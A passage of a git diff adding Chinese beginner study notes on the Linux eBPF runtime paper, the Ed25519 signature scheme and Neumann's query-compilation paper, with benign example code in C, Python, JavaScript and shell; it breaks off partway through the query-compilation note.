输出场景(论文 Table 2): - [[attention]] —— Attention Is All You Need - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU - [[specinfer-2023]] —— SpecInfer — 让大模型一次"猜一棵树"再并行验证 +- [[tensorrt-llm-overview]] —— TensorRT-LLM — NVIDIA 开源 LLM 推理优化库零基础笔记 - [[vllm]] —— vLLM — 高吞吐 LLM 推理引擎 diff --git a/src/content/docs/papers/earley-parser.md b/src/content/docs/papers/earley-parser.md index c5bf57eec..572403c15 100644 --- a/src/content/docs/papers/earley-parser.md +++ b/src/content/docs/papers/earley-parser.md @@ -164,4 +164,5 @@ fn parse_with_recovery(tokens): - [[pottier-merr]] —— Pottier LR(1) Reachability — 让 LR 解析器的错误消息覆盖完整 - [[reynolds-definitional-interpreters]] —— Reynolds Definitional Interpreters — 用一种语言去定义另一种语言 - [[tomita-glr]] —— Tomita GLR — 让 LR 解析器扛得住歧义文法 +- [[tree-sitter-2018]] —— Tree-sitter — 增量式解析系统 diff --git a/src/content/docs/papers/ebpf-linux-runtime-2024.md b/src/content/docs/papers/ebpf-linux-runtime-2024.md new file mode 100644 index 000000000..222efcacc --- /dev/null +++ b/src/content/docs/papers/ebpf-linux-runtime-2024.md @@ -0,0 +1,302 @@ +--- +title: The eBPF Runtime in the Linux Kernel — Linux 内核可编程运行时零基础导读 +来源: https://arxiv.org/abs/2410.00026 +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象 Linux 内核是一座**戒备森严的政府大楼**: + +- 普通应用只能在大厅(用户态)办事,**不能随便改大楼内部的线路和规则**。 +- 传统做法是写**内核模块**——相当于雇施工队砸墙改管线:能力强,但改错一根线整栋楼停电(内核 panic),而且每次升级大楼都要重新审批施工方案。 +- 另一派做法是**绕过内核**(DPDK、用户态网络栈):在大楼外面搭临时工棚,性能极高,但失去了大楼原有的安保、水电分摊和统一管理。 + +**eBPF** 的做法是:在大楼里装一套**带安检的临时工位系统**—— + +1. 你在用户态写好一份「微型脚本」(eBPF 程序); +2. 加载时必须经过**安检仪**(verifier)静态分析,证明你不会越权、不会死循环、不会乱碰内存; +3. 通过后由 **JIT** 翻译成原生机器码,挂到内核预设的**事件挂钩**(hook)上; +4. 事件发生时(收包、系统调用、函数入口……)你的脚本在**内核态**以接近原生的速度跑一小段逻辑,然后交还给原有内核流程。 + +论文作者(Gbadamosi、Leonardi、Pulls、Høiland-Jørgensen 等,基于 **Linux 6.7**,2024 年 9 月 arXiv)称:这是**第一篇**系统描述 Linux 内核 eBPF 运行时设计与实现的综述,覆盖从加载、验证、JIT 到典型用例与开放挑战。 + +> 论文澄清了一个常见误解:**eBPF 的设计并非直接继承 Classic BPF**,名字只是为了熟悉感;它是一套面向通用内核可编程的寄存器虚拟机。 + +## 为什么需要 eBPF + +### 直接改内核的痛点 + +| 问题 | 具体表现 | +|------|----------| +| 开发与调试难 | 内核代码库庞大,改一行要懂子系统全局 | +| 部署成本高 | 换内核要重启机器,冷启动、回归测试,车队 rollout 以周/月计 | +| 稳定性风险 | bug 直接导致整机崩溃,生产直接等于宕机 | +| API 不稳定 | 未上游化的补丁每次内核升级都要 forward-port | + +### 绕过内核的代价 + +Kernel bypass(如专用 poll 模式网卡驱动)和 library OS 能把性能榨到极致,但通常需要**独占硬件**、**重写应用**,且多工作负载**难以共享**同一台机器——对跑在 Linux 上的大规模生产 fleet 并不总是可接受。 + +### eBPF 的定位 + +论文概括为三条设计原则: + +1. **安全、动态的内核定制** —— 在虚拟机沙箱里改行为,不破坏内核完整性; +2. **快速部署与迭代** —— `bpf()` 加载/卸载,无需 reboot; +3. **与内核协同** —— 可以 fallback 到原有内核逻辑,不必整段重写网络栈或调度器。 + +eBPF 自 **Linux 3.18(2014)** 合入主线,到 6.7 已支撑网络、追踪、安全、调度等整条产品线。 + +## 核心概念 + +### 1. eBPF 虚拟机与字节码 + +eBPF 是一套**抽象虚拟机** + **64 位指令集**(算术、跳转、load/store、原子操作、函数调用): + +- **11 个 64 位寄存器** `r0`–`r10`,其中 `r10` 只读、指向栈顶; +- 固定大小栈; +- 程序由若干 **subprog**(类似函数)组成,从 main subprog 开始执行。 + +指令集刻意**贴近真实硬件 ISA**,方便 JIT 做接近 1:1 的翻译,也让 LLVM 后端能生成高效字节码。 + +### 2. 运行时组件(论文 Figure 1) + +```text +用户态 内核态 +───────── ───────────────────────────────── +C/Rust 源码 ──clang──► .o (BPF ELF) + │ │ +libbpf/bpftool ──bpf()──► Verifier ──► JIT/解释器 + │ │ │ + │ ▼ ▼ + └── map fd ◄────── Maps ◄────── Hook 触发执行 +``` + +| 组件 | 作用 | +|------|------| +| **用户态 Loader**(libbpf、BCC、bpftool) | 编译、解析 ELF、调用 `bpf(BPF_PROG_LOAD)` | +| **Verifier** | 加载前静态分析,拒绝不安全程序 | +| **JIT / 解释器** | 验证通过后翻译为机器码(无 JIT 时解释执行) | +| **Hooks** | 挂载点:XDP、tracepoint、kprobe、LSM、cgroup…… | +| **Program Type** | 决定可用 helper、上下文结构、合法挂载点 | +| **Helpers** | 内核提供的「系统调用」,如打日志、改包、查 map | +| **Maps** | 内核与用户态、程序与程序之间的共享数据结构 | +| **Links** | 把程序挂载与 fd 生命周期绑定,进程退出后 probe 仍可存活 | +| **BTF** | 紧凑类型信息,供 verifier 做类型检查 + CO-RE 重定位 | + +### 3. 对象生命周期 + +每个 eBPF 对象(program、map、link)在内核有对应表示,通过 **fd** 暴露给用户态: + +- 最后一个 fd 关闭 → 内核释放对象; +- 可 **pin** 到 `bpffs` 伪文件系统 → 跨进程持久化。 + +### 4. BTF 与 CO-RE + +**BPF Type Format (BTF)** 是专为 eBPF 设计的调试/类型格式,比 DWARF 紧凑一个数量级,因此可以**随内核和程序一起发布**。 + +**CO-RE(Compile Once – Run Everywhere)** 利用 BTF 在加载时解析结构体字段偏移、内核配置项,使**同一份编译产物**能在不同内核版本上运行——无需为每个目标内核重新编译。 + +### 5. Verifier:四道关卡 + +论文将验证分为四个 major pass: + +| Pass | 内容 | +|------|------| +| 1. CFG 校验 | DFS 遍历控制流图,禁止无法证明终止的循环、不可达指令 | +| 2. 符号执行 | 逐路径追踪寄存器/栈的类型与边界,强制内存/资源/类型安全 | +| 3. 优化与改写 | 死代码消除、helper 内联(如 map 访问特化) | +| 4. JIT | 生成只读可执行镜像,可选 constant blinding 防 JIT spraying | + +**State pruning**(借鉴 RWSet 思想)在分支爆炸时剪枝等价状态,否则稍大的程序就会撞上「指令复杂度上限」。 + +### 6. 安全属性(论文 §5) + +Verifier 力求保证: + +- **内存安全** —— 无越界、无任意指针解引用、无 UAF; +- **类型安全** —— 借助 BTF 校验内核结构体访问; +- **资源安全** —— 退出前释放内存、锁、引用计数; +- **信息泄漏安全** —— 内核指针不能泄露到用户可见区域; +- **无数据竞争**(对内核状态)—— 通过 helper 同步; +- **可终止** —— 复杂度上限 + 有界循环展开; +- **无死锁** —— 同一时刻最多持有一把 bpf spinlock; +- **执行上下文不变量** —— 不破坏 hook 所在内核代码的假设。 + +### 7. 典型工作流(论文 Figure 3) + +1. **S1** 用 C 写程序(带 `SEC("xdp")` 等段属性); +2. **S2** `clang -target bpf` 编译成 BPF ELF; +3. **S3–S4** libbpf/bpftool 经 `BPF_PROG_LOAD` 提交,verifier + JIT; +4. **S5** `BPF_LINK_CREATE` 挂到网卡 XDP 等 hook; +5. 事件触发执行;**S6–S7** 关闭 link/program fd 卸载。 + +## 代码示例一:XDP 丢弃 UDP(论文 Listing 1) + +下面这段与论文中的 XDP 示例同构——在网卡驱动层收到包时,丢弃所有 **IPv4 UDP** 流量,其余 `XDP_PASS`: + +```c +#include +#include +#include +#include +#include + +SEC("xdp") +int bpf_program(struct xdp_md *ctx) +{ + void *data_end = (void *)(long)ctx->data_end; + void *data = (void *)(long)ctx->data; + + struct ethhdr *eth = data; + /* verifier 要求:每次指针运算前比较边界 */ + if (eth + 1 > data_end) + return XDP_PASS; + + if (eth->h_proto != bpf_htons(ETH_P_IP)) + return XDP_PASS; + + struct iphdr *iph = (void *)(eth + 1); + if (iph + 1 > data_end) + return XDP_PASS; + + if (iph->protocol == IPPROTO_UDP) + return XDP_DROP; + + return XDP_PASS; +} + +char _license[] SEC("license") = "GPL"; +``` + +**零基础要盯住的点:** + +- `data` / `data_end` 界定包缓冲区;`if (ptr + 1 > data_end)` 是 **verifier 能证明安全** 的标准写法; +- `SEC("xdp")` 告诉 loader 这是 XDP 程序类型; +- 返回值 `XDP_DROP` / `XDP_PASS` 决定包命运。 + +加载与挂载(现代 libbpf 风格,概念示意): + +```bash +clang -O2 -g -target bpf -c xdp_drop_udp.c -o xdp_drop_udp.o +bpftool prog load xdp_drop_udp.o /sys/fs/bpf/xdp_drop_udp +bpftool net attach xdp id dev eth0 +``` + +## 代码示例二:tracepoint + map 统计 syscall + +第二个例子展示 **tracing** 与 **map** 协作——统计 `execve` 次数,用户态定期读取: + +```c +/* trace_execve.bpf.c */ +#include +#include +#include + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 1); + __type(key, __u32); + __type(value, __u64); +} exec_count SEC(".maps"); + +SEC("tracepoint/syscalls/sys_enter_execve") +int trace_execve(void *ctx) +{ + __u32 key = 0; + __u64 *val = bpf_map_lookup_elem(&exec_count, &key); + if (val) + __sync_fetch_and_add(val, 1); + return 0; +} + +char _license[] SEC("license") = "GPL"; +``` + +用户态读取(libbpf skeleton 或 bpftool): + +```c +/* 简化示意:map fd 由 loader 打开 */ +int map_fd = bpf_obj_get("/sys/fs/bpf/exec_count"); +__u32 key = 0; +__u64 count = 0; +bpf_map_lookup_elem(map_fd, &key, &count); +printf("execve count: %llu\n", count); +``` + +这里体现了论文强调的 **Maps 作为用户态/内核态数据交换通道**,以及 **tracepoint hook** 的低开销观测能力。 + +## 主要应用场景(论文 §10) + +| 领域 | 代表能力 | +|------|----------| +| **网络** | XDP/TC 高性能包处理、sk_lookup、reuseport 选型、cgroup 策略、自定义拥塞控制 | +| **Profiling** | perf 事件 + 栈采样,Cilium/Pixie 等连续剖析 | +| **Tracing** | kprobe/tracepoint 访问函数参数,bcc/bpftrace 生态 | +| **安全** | LSM BPF 可编程强制访问控制、审计 | +| **新兴** | HID-BPF 驱动片段、SCHED_EXT/ghOSt 可编程调度、XRP 存储加速 | + +Cloudflare、Cilium、Meta、Google 等已将 eBPF 用于 DDoS 清洗、Kubernetes 网络策略、生产级可观测和安全基线。 + +## 与「改内核 / 绕过内核」的对比 + +```text + 安全性 部署速度 性能 与内核集成 +内核模块 低 慢 高 深 +Kernel bypass 中 中 极高 弱 +eBPF 高 快 高 深(可 fallback) +``` + +eBPF 不是要取代内核子系统,而是让你在**不重启、不 fork 内核源码**的前提下,把策略和观测逻辑「插」在关键路径上。 + +## 挑战与未来方向(论文 §11) + +1. **易用性** —— hook 选型门槛高,文档与工具链仍在快速演进; +2. **Verifier 可扩展性** —— 循环体带分支时路径爆炸,复杂程序常被拒; +3. **Verifier 正确性** —— 实现庞大、变更频繁,逻辑 bug 可能放过恶意程序; +4. **形式化验证** —— 数值域、JIT 正确性已有部分工作,全 verifier 形式化仍是开放问题; +5. **安全模型** —— 非特权 eBPF 默认关闭;`CAP_BPF` 细化了权限,但许多程序类型仍需 `CAP_NET_ADMIN` 等; +6. **代码复用** —— 有 CO-RE,但跨文件静态/动态库支持仍弱。 + +## 学习路径建议 + +1. **先跑起来**:`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { @[comm] = count(); }'` 感受零编译观测; +2. **读内核文档**:[BPF 文档](https://docs.kernel.org/bpf/index.html)、[bpf-helpers(7)](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html); +3. **用 libbpf + CO-RE**:`clang -target bpf -g` 生成带 BTF 的 `.o`,`bpftool btf dump` 查看类型; +4. **对照论文 Figure 1–5** 理解 verifier → JIT 流水线; +5. **选一个垂直深入**:网络从 XDP 开始,观测从 tracepoint 开始,安全从 LSM BPF 开始。 + +## 关键术语速查 + +| 术语 | 一句话 | +|------|--------| +| eBPF | 内核内的安全可编程虚拟机运行时 | +| Verifier | 加载前静态分析器,安全守门人 | +| JIT | 把字节码编译为原生指令 | +| Hook | 程序被事件触发执行的挂载点 | +| Map | 内核与用户态共享的 KV/数组等结构 | +| BTF | 紧凑类型/debug 信息格式 | +| CO-RE | 一次编译、多内核版本加载 | +| XDP | 网卡驱动层最早的可编程包处理点 | +| libbpf | 官方推荐的用户态加载库 | + +## 总结 + +这篇论文的价值在于:把散落在内核源码、邮件列表和各类 slide 里的 eBPF 知识,**第一次**整理成从虚拟机模型、对象生命周期、verifier 四 pass、JIT hardening 到生产用例的完整地图。对零基础读者,抓住三条线就够了: + +1. **编程模型** —— C/Rust → BPF 字节码 → verifier → JIT → hook; +2. **安全模型** —— 不是「信任开发者」,而是「证明器必须接受才运行」; +3. **工程模型** —— 与内核共生、热加载、CO-RE 跨版本,而不是另起炉灶。 + +eBPF 让 Linux 从「只能调旋钮的内核」变成「带安检的可编程内核」——理解这套运行时,是读懂现代云原生网络、可观测性和内核安全产品的钥匙。 + +## 参考 + +- 论文:[arXiv:2410.00026](https://arxiv.org/abs/2410.00026)(v2,2024-10) +- DOI:[10.48550/arXiv.2410.00026](https://doi.org/10.48550/arXiv.2410.00026) +- 内核文档:[eBPF 子系统](https://docs.kernel.org/bpf/index.html) +- 指令集规范:[eBPF ISA](https://docs.kernel.org/bpf/standardization/isa.html) diff --git a/src/content/docs/papers/ed25519-2011.md b/src/content/docs/papers/ed25519-2011.md new file mode 100644 index 000000000..36156d3f8 --- /dev/null +++ b/src/content/docs/papers/ed25519-2011.md @@ -0,0 +1,248 @@ +--- +title: Ed25519 (2011) — 高速高安全的椭圆曲线数字签名 +来源: https://ed25519.cr.yp.to/ed25519-20110926.pdf +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +**Ed25519** 是 Daniel J. Bernstein、Niels Duif、Tanja Lange、Peter Schwabe、Bo-Yin Yang 在 2011 年论文 *High-speed high-security signatures* 中提出并工程化的**公钥数字签名方案**。名字拆开看:**Ed** = Edwards 曲线上的 **DSA** 风格签名;**25519** = 底层曲线与 [[curve25519-2006]] 同源、工作在素数域 \(\mathbb{F}_{2^{255}-19}\) 上。完整参数记作 **Ed25519-SHA-512**:哈希用 SHA-512,公钥 32 字节,签名 64 字节,安全目标约 \(2^{128}\)。 + +日常类比: + +> 想象你在合同上盖章。传统 RSA 像一把**巨型铜印**——印泥厚、盖一下慢、印模又大(密钥和签名都长),但全世界都认得这种章。ECDSA 像**手工刻的私章**——小巧一些,可刻章师若手抖(随机数 \(k\) 泄露)或印泥配方写错(nonce 重用),别人能仿造你的章。 +> **Ed25519** 则像工厂里的**标准化激光刻章机**:章面只有 32 字节「公钥图案」,盖出来固定 64 字节;刻章机按消息内容**确定性**算出图案,不依赖每次重新摇骰子;验章的人用公开说明书(曲线方程 + 哈希规则)几微秒就能验真,而且机器内部**从不根据秘密数据选不同工序**——旁路偷看流水线也猜不出私钥。 + +论文在 2011 年 Westmere 四核 CPU 上实测:签名约 **10.9 万次/秒**,验签约 **7.1 万次/秒**;批量验 64 条签名时摊到每条不到 **13.4 万周期**。这些数字在发表时把 eBATS 基准里绝大多数 RSA、DSA、ECDSA 实现甩开一倍以上,同时把**软件侧信道防护**写进设计而非事后补丁。 + +## 为什么重要 + +不理解 Ed25519,现代「轻量签名」生态很难读透: + +- **SSH**:OpenSSH 6.5+ 默认推荐 `ssh-ed25519` 主机与用户密钥 +- **TLS 1.3**:IANA 注册 `signature_ed25519`(0x0807),与 ECDSA、RSA-PSS 并列 +- **Git / 供应链**:Git 2.19+ 支持 `git commit -S` 用 Ed25519;Sigstore、cosign 常用 Ed25519 签容器镜像 +- **加密货币与协议**:不在链上直接用,但 Monero 等用 Ed25519 变体;Noise、WireGuard、libsodium/NaCl 把 Ed25519 当默认身份原语 +- **后量子过渡期**:短密钥、快验签、实现简单,在 NIST 后量子签名普及前是**默认的「非 RSA」选择** + +与 [[rsa-1978]]、[[rsa]] 相比:Ed25519 不依赖大整数分解;与 NIST P-256 ECDSA 相比:签名格式唯一(无 DER 歧义)、确定性 nonce(无 Sony PS3 式灾难)、原生抗哈希碰撞传递攻击。 + +## 论文与 EdDSA 族 + +论文定义了一般框架 **EdDSA**(Edwards-curve Digital Signature Algorithm),再固定一组参数得到 **Ed25519**: + +| 参数 | Ed25519 取值 | +|------|----------------| +| 位长 \(b\) | 256 | +| 哈希 \(H\) | SHA-512 | +| 域 | \(\mathbb{F}_q\),\(q = 2^{255} - 19\) | +| 曲线 | twisted Edwards:\(-x^2 + y^2 = 1 + dx^2y^2\),\(d = -121665/121666\) | +| 基点 \(B\) | 与 Curve25519 双有理等价的那条曲线上的规范点 | +| 子群阶 \(\ell\) | 接近 \(2^{252}\) 的素数(见论文与 [ed25519.cr.yp.to](https://ed25519.cr.yp.to/)) | + +曲线与 Curve25519 **双有理等价**,故椭圆曲线离散对数(ECDLP)难度与 Bernstein 2006 年分析的 Curve25519 同源——选曲线不是拍脑袋,而是把已有安全假设搬过来。 + +## 核心概念 + +### 1. 密钥长什么样 + +- **私钥**:\(b\) 位字符串 \(k\)(256 位随机,或从种子扩展) +- **公钥**:\(A = aB\),其中 \(a = H(k)\) 经裁剪与解释成标量(实现里常先算 \(h = H(k)\),用 \(h\) 的派生片段作 \(a\)) +- **编码**:公钥 32 字节 little-endian \(y\) 坐标 + 符号位;签名 64 字节 = \(R\) 的编码 \(\|\) \(S\) 的 little-endian 编码 + +密钥生成几乎与签名同速——论文报告约 **93288 周期**生成一对密钥(另加 OS 随机数开销)。 + +### 2. 签名(Signing) + +对消息 \(M\): + +1. 由私钥导出秘密标量 \(a\) 与前缀 \(h_{\text{prefix}}\)(实现细节见 RFC 8032,与论文一致 spirit) +2. 计算 \(r = H(h_{\text{prefix}} \,\|\, M)\),解释成标量 +3. \(R = rB\)(基点标量乘) +4. \(S = r + H(R \,\|\, A \,\|\, M) \cdot a \pmod \ell\) +5. 输出 \((R, S)\) 的压缩编码 + +**确定性 \(r\)**:同一 \((k, M)\) 永远得到同一签名——不调用 `random()` 生成 nonce。这消除 ECDSA 因 \(k\) 泄露或重用(PlayStation 3、Android Bitcoin 钱包等)导致私钥被恢复的经典坑。 + +**哈希进入挑战**:挑战是 \(H(R, A, M)\),不是 \(H(M)\) alone。因此即使 SHA-512 出现碰撞 \(M \neq M'\) 且 \(H(M)=H(M')\),攻击者仍难以完成 \(H(R,A,M)=H(R,A,M')\) 的第二次原像式伪造——论文称为 **collision resilience**。 + +### 3. 验签(Verification) + +给定 \((R, S)\)、公钥 \(A\)、消息 \(M\): + +1. 检查 \(R\)、\(S\) 在合法范围内(\(S < \ell\),\(R\) 在曲线上) +2. 计算 \(h = H(R \,\|\, A \,\|\, M)\) +3. 验证 \(SB = R + hA\)(椭圆曲线多标量乘) + +验证只做**加法链**,私钥从不出现;实现可用 Straus / Bos–Coster 做多标量乘,论文单签约 **273364 周期**。 + +### 4. 批量验证(Batch Verification) + +验签方程 \(SB = R + hA\) 可对多条签名做随机线性组合,一次多标量乘验一批——摊销后每条签名周期数可降到 **13 万以下**。代价是:**ECDSA 的验签方程结构不支持**这种廉价批处理,这是 EdDSA 族在 CDN、区块链轻客户端、日志审计等场景的结构性优势。 + +### 5. 侧信道防护(论文核心卖点之一) + +论文要求参考实现满足: + +- **无秘密数组下标**:访存地址不依赖私钥比特 → 抗 cache-timing +- **无秘密分支**:跳转模式不依赖私钥 → 抗分支预测泄漏 + +这与「先快后补洞」的 OpenSSL ECDSA 形成对比。现代 libsodium、ref10、HACL\* 等库延续这一传统(见 [[hacl-star-2017]])。 + +## 与 RSA / ECDSA 对照 + +| 维度 | RSA-2048 | ECDSA P-256 | Ed25519 | +|------|----------|-------------|---------| +| 公钥大小 | 256+ 字节 | 33 字节(压缩) | **32 字节** | +| 签名大小 | 256 字节 | 64–72 字节(DER 可变) | **64 字节固定** | +| 签名速度 | 慢 | 中等 | **很快** | +| 验签速度 | 中等 | 中等 | **很快** | +| Nonce | 不适用 | **必须高质量随机 \(k\)** | **确定性,无需随机 \(k\)** | +| 编码歧义 | PKCS#1 v1.5 坑 | DER 非唯一 | **规范编码** | +| 哈希碰撞 | 影响签名安全 | \(H(M)\) 碰撞可伪造 | **设计层缓解** | + +## 代码示例 + +### 示例 1:Python(`cryptography` 库) + +```python +from cryptography.hazmat.primitives.asymmetric.ed25519 import ( + Ed25519PrivateKey, +) +from cryptography.hazmat.primitives import serialization + +# 生成密钥对 +private_key = Ed25519PrivateKey.generate() +public_key = private_key.public_key() + +# 导出 PEM(可选,便于存盘) +priv_pem = private_key.private_bytes( + encoding=serialization.Encoding.PEM, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.NoEncryption(), +) +pub_pem = public_key.public_bytes( + encoding=serialization.Encoding.PEM, + format=serialization.PublicFormat.SubjectPublicKeyInfo, +) + +message = b"study note: Ed25519 signs this payload" + +# 签名:内部即 Ed25519-SHA-512,确定性 +signature = private_key.sign(message) +assert len(signature) == 64 + +# 验签 +public_key.verify(signature, message) # 失败会抛 InvalidSignature + +# 篡改一字节即失败 +try: + public_key.verify(signature[:-1] + bytes([signature[-1] ^ 1]), message) +except Exception as e: + print("tamper detected:", type(e).__name__) +``` + +同一私钥、同一消息,多次 `sign` 得到**完全相同**的 64 字节——这是与 ECDSA 最直观的 API 层差异。 + +### 示例 2:Node.js(`crypto` 内置) + +```javascript +import { generateKeyPairSync, sign, verify, createPublicKey } from "node:crypto"; + +const { privateKey, publicKey } = generateKeyPairSync("ed25519"); + +const data = Buffer.from("pipeline-v3 ed25519 note", "utf8"); + +const sig = sign(null, data, privateKey); +console.log("signature length:", sig.length); // 64 + +const ok = verify(null, data, publicKey, sig); +console.log("verify:", ok); // true + +// 从私钥导出公钥对象(验签方通常只持 publicKey) +const derivedPub = createPublicKey(privateKey); +console.log( + "keys match:", + derivedPub.export({ type: "spki", format: "der" }).equals( + publicKey.export({ type: "spki", format: "der" }) + ) +); +``` + +生产环境应把私钥放在 HSM、云 KMS 或至少权限受限的文件里;上面片段仅演示算法接口。 + +### 示例 3:OpenSSH 命令行(零代码上手) + +```bash +# 生成 Ed25519 主机/用户密钥(默认已广泛支持) +ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C "me@study" + +# 查看公钥(32 字节 raw → base64 在 OpenSSH 格式里) +cat ~/.ssh/id_ed25519.pub +# ssh-ed25519 AAAAC3Nza... me@study + +# 用该密钥登录(服务端需配置 authorized_keys) +ssh -i ~/.ssh/id_ed25519 user@host +``` + +`ssh-ed25519` 类型字符串后的 blob 即 Ed25519 公钥的 SSH 编码,与论文 32 字节公钥一一对应(外加类型前缀与 comment)。 + +## 签名方程一览(便于手推) + +设基点 \(B\),私钥标量 \(a\),公钥 \(A=aB\)。签名时: + +\[ +r = H(h_{\text{prefix}}, M) \bmod \ell,\quad R = rB,\quad S \equiv r + H(R,A,M)\,a \pmod \ell +\] + +验签: + +\[ +SB \stackrel{?}{=} R + H(R,A,M)\,A +\] + +若成立,则 \(S B = rB + h a B = R + hA\)。全程只需标准群运算与 SHA-512——**没有模 \(n\) 的求逆、没有 DER 拼装**。 + +## 标准与实现地图 + +| 文档 / 项目 | 说明 | +|-------------|------| +| 原论文 PDF | [ed25519-20110926.pdf](https://ed25519.cr.yp.to/ed25519-20110926.pdf) | +| 期刊版 | *Journal of Cryptographic Engineering* 2 (2012), 77–89 | +| **RFC 8032** | IETF 标准 EdDSA,含 Ed25519 测试向量 | +| **libsodium** / NaCl | `crypto_sign_ed25519`,论文作者生态的参考实现 | +| **RFC 8410** | PKIX 中 Ed25519 公钥编码 | +| **OpenSSH / OpenSSL 3** | 生产部署最常用入口 | + +读 RFC 8032 时以论文为「为什么这样设计」,以 RFC 为「字节级互操作规范」。 + +## 踩过的坑 + +1. **把 Ed25519 当 X25519 用**:Curve25519 是 Montgomery 形做 DH([[curve25519-2006]]);Ed25519 是 Edwards 形做签名。公钥编码不同,**不能**把 DH 公钥直接当验签公钥,需用标准转换(libsodium `crypto_sign_ed25519_sk_to_pk` 等)。 +2. **私钥 64 字节 vs 32 字节种子**:libsodium 的 `secretkey` 常是 64 字节(seed \(\|\) pubkey);只存前 32 字节 seed 即可重建,但备份格式要一致。 +3. **上下文(context)扩展**:Ed25519 ctx(RFC 8032)在 \(H\) 输入里加域分离字符串;与「纯」Ed25519 不互通,库需显式选 `Ed25519ph` / `Ed25519ctx`。 +4. **批量验签的随机数**:批验用随机系数组合方程,实现必须用密码学安全随机,且失败时要有回退单条验签。 +5. **合规话术**:「128 位安全」指经典攻击模型;**量子计算机**上 Shor 类算法仍威胁离散对数——长期身份密钥需规划向 ML-DSA(CRYSTALS-Dilithium)等迁移,Ed25519 是当下工程默认,不是终极答案。 + +## 与知识图谱的衔接 + +- **前置**:[[diffie-hellman]](公钥范式)、[[rsa-1978]](签名语义)、[[curve25519-2006]](同源曲线) +- **并列**:[[hkdf-rfc5869]](派生密钥,不替代签名)、[[noise-protocol-framework]](握手里常用 Ed25519 身份) +- **实现向**:[[hacl-star-2017]](验证过的 Curve25519/Ed25519 算术) + +## 小结 + +Ed25519 把 Edwards 曲线、确定性 nonce、哈希挑战格式和常数时间实现绑成**一套短密钥、短签名、快慢验、默认可互操作**的方案。论文的贡献不仅是「又一条椭圆曲线」,而是证明:**在 128 位经典安全级别上,签名可以比 RSA/ECDSA 小得多、快得多,同时把侧信道与随机数失败模式从设计上拿掉**。今天你在 SSH、Git、TLS、容器签名里看到的 `ed25519`,基本都是这篇 2011 年工作的工程后代。 + +--- + +## 参考资料 + +- Bernstein, Duif, Lange, Schwabe, Yang, *High-speed high-security signatures*, 2011. https://ed25519.cr.yp.to/ed25519-20110926.pdf +- 项目主页与性能数据:https://ed25519.cr.yp.to/ +- IETF RFC 8032: Edwards-Curve Digital Signature Algorithm (EdDSA) +- eBATS 基准(论文周期数来源):https://bench.cr.yp.to/ diff --git a/src/content/docs/papers/efficient-compile-2011.md b/src/content/docs/papers/efficient-compile-2011.md new file mode 100644 index 000000000..ec9aaf1fd --- /dev/null +++ b/src/content/docs/papers/efficient-compile-2011.md @@ -0,0 +1,320 @@ +--- +title: Efficiently Compiling Efficient Query Plans for Modern Hardware — 面向现代 CPU 的查询编译 +来源: https://www.vldb.org/pvldb/vol4/p539-neumann.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +## 从日常类比开始:流水线 vs 现做现炒 + +想象一家大型**中央厨房**要处理成千上万份订单(SQL 查询)。 + +**老式 Volcano(火山/迭代器)模型**像每条产线都设一个「中转站管理员」: + +- 每做好**一份菜**(一行 tuple),管理员就打电话问上游「下一道是什么?」——对应 `Next()` 虚函数调用; +- 电话要打**几百万次**,而且对方号码还经常变(函数指针),CPU 分支预测器猜不准; +- 每转一站,案板上的食材(寄存器里的列值)就被清空,下次还得重新从仓库(内存)搬——**局部性极差**。 + +**批处理 / 向量化**模型像改成「一次端出一托盘」:电话少打了,但托盘太大,放不进灶台(寄存器),只好先堆在临时货架上——**流水线(pipelining)断了**,内存带宽压力上来。 + +Neumann 在 VLDB 2011 这篇论文里提出第三条路:**把整张订单编译成一段「现做现炒」的专用机器码**—— + +- 食材在寄存器里一路传递,直到必须「装盘」(pipeline breaker 物化)才写内存; +- 数据**推(push)**向消费者,而不是算子**拉(pull)**; +- 用 **LLVM JIT** 在毫秒级生成接近手写 C++ 性能的本地代码。 + +这套思路集成在 TUM **HyPer** 内存数据库中,后来深刻影响了 Umbra、DuckDB、Hyper/Tableau 等系统的执行引擎设计。 + +--- + +## 这篇论文在解决什么问题 + +### 1. 内存够大了,瓶颈回到 CPU + +当数据能放进主存,查询耗时不再由磁盘 I/O 主导,而是 **CPU 怎么算** 主导。Volcano 模型诞生于 I/O 时代,其「每行一次虚调用」的开销在内存数据库里变得不可接受。 + +### 2. 向量化仍输给手写代码 + +MonetDB/X100(后来的 VectorWise)用向量批处理大幅提速,但论文引用 Figure 1 表明:对 TPC-H Q1 这类简单聚合,**手写 C++ 仍明显更快**——说明现有执行模型在「把数据留在寄存器里」这件事上还有根本差距。 + +### 3. 查询编译不是新概念,但旧路有坑 + +| 方案 | 问题 | +|------|------| +| 编译成 JVM 字节码(IBM 等) | 仍用迭代器模型,收益有限 | +| 编译成 C 再调 gcc(HIQUE 等) | **编译秒级**,交互式查询不可接受 | +| HyPer 早期:拼接 C++ 代码片段 | 性能尚可,但 gcc 编译慢、代码生成易错 | + +论文的核心主张:**代数计划仍然用于优化与推理,但执行时不应再暴露算子边界**——而应编译成 **data-centric(以数据为中心)** 的 imperative 程序。 + +--- + +## 核心概念 + +### 1. Volcano / Iterator 模型(对照组) + +每个物理算子实现 `open` / `next` / `close`,上层反复 `next()` 拉取下一行: + +- 优点:组合任意算子、逻辑清晰(System R 传统)。 +- 缺点:每 tuple 跨函数边界;虚调用 / 函数指针;中间状态散落,**cache 与分支预测**双输。 + +### 2. Pipeline Breaker(流水线断点) + +论文采用比常规定义**更严格**的 pipeline breaker: + +> 若算子把传入 tuple **赶出 CPU 寄存器**(通常意味着物化到内存),则对该输入侧是 breaker;若**全部物化**后再继续,则是 **full pipeline breaker**。 + +目标:**在两个 breaker 之间,tuple 尽量只活在寄存器里**,热路径是纯 tight loop。 + +典型 breaker:Hash Join 的 build 侧、Sort、Group By 哈希表构建等。 + +### 3. Push vs Pull + +| | Pull(Volcano) | Push(本文) | +|---|----------------|--------------| +| 控制流 | 父算子向下要数据 | 子算子向上**推**数据 | +| 